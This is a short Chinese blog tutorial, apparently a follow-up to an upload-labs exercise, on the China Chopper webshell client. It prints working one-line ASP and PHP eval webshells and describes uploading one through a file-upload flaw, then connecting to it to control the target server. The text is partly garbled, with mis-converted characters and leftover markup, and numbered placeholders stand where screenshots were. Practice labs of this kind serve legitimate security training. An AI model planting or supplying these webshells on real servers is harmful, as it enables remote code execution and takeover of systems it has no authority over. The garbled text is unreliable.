菜刀的安裝大家在網(wǎng)上隨便一搜就很多，這里不再和大家詳解，主要是講解一下菜刀的原理及使用；

1.中國菜刀支持的服務端腳本：PHP、ASP；（常用的腳本就這兩種）
2.主要功能有：文件管理（有足夠的權限時候可以管理整個磁盤/文件系統(tǒng)），數(shù)據(jù)庫管理，虛擬終端。
3.菜刀的工作原理是：利用上傳到服務器的一句話木馬再通過一些添加配置就可以工作了

一句話木馬：
Asp： <%eval request("x")%>

php: <?php @eval($_POST['x']);?>

我們就拿上一篇博客upload-labs教程（一）來講一下：
在上一篇中，我們通過文件長傳漏洞成功將我們的一句話木馬寫入服務器中，這時我們就需要通過菜刀進入到對方的電腦中；
首先，我們先將一句話木馬寫入事先準備好的zqlone.php中，如圖：

1

然后就根據(jù)上一篇博客upload-labs教程（一）進行抓包：

2

3

4

將這些信息填到相應的位置，然后點擊添加?。?/p>

5

成功進入到對方電腦中?。?！